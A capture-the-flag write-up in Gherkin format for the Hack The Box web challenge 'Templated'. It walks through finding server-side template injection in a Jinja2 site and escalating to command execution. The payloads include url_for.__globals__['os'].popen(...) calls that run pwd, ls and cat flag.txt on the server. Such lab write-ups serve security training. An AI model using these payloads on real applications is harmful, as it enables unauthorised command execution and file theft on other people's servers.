## Version 2.0
## language: en

Feature: templated-web-hackthebox
  Site:
    https://www.hackthebox.eu/
  Category:
    web
  User:
    rdanilu
  Goal:
    Find the flag

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Kali Linux      | 2020.4    |
    | Mozilla Firefox | 78.5.0    |

  Machine information:
    Given I am accessing the challenge site
    When I read the challenge information
    Then it mentioned the next
    """
    Can you exploit this simple mistake?
    """
    Then I accessed to the website challenge [evidence](01.png)

  Scenario: Fail: Find the flag in the webpage parameters
    Given The entered in the challenge site
    When I analyzed the main page
    Then I noted that the site was using Jinja2
    Then I tried the following payload
    """
    ${{<%[%'"}}%\
    """
    And thus I realized that the site was vulnerable to SSTI [evidence](02.png)
    When I tried the payload below
    """
    {{7*'7'}}
    """
    Then I got the next output [evidence](03.png)
    And I was totally sure that the interpreter could execute commands remotely
    When I visualized configuration items with the following payload
    """
    {{config.items()}}
    """
    Then I saw the next result [evidence](04.png)
    When I listed all attributes with the payload below
    """
    {{self.__dict__}}
    """
    Then I realized that I could use url_for function [evidence](05.png)
    When I listed its attributes
    Then I noted that current_app was available [evidence](06.png)
    When I used the payload below to get the flag
    """
    {{url_for.__globals__['current_app'].config['FLAG']}}
    """
    Then it didn't work [evidence](07.png)
    And I knew that the previous approach was wrong

  Scenario: Success: Find the flag searching in the server files
    Given that previously I couldn't find the flag
    When I tried a different approach
    Then I listed url_for attributes one more time with the payload below
    """
    {{url_for.__globals__}}
    """
    Then I identified that os module was available [evidence](08.png)
    And I noted that I could execute commands in the server
    When I used the following payload to know which was the path
    """
    {{url_for.__globals__['os'].popen('pwd').read()}}
    """
    Then I received the next response [evidence](09.png)
    And I realized that I was on the root directory
    When I listed files in that directory with the payload below
    """
    {{url_for.__globals__['os'].popen('ls').read()}}
    """
    Then I saw the following directories and files [evidence](10.png)
    And I identified the flag.txt file
    Then I visualized its content with the next payload
    """
    {{url_for.__globals__['os'].popen('cat flag.txt').read()}}
    """
    And thus I found out the flag and solved the challenge [evidence](11.png)
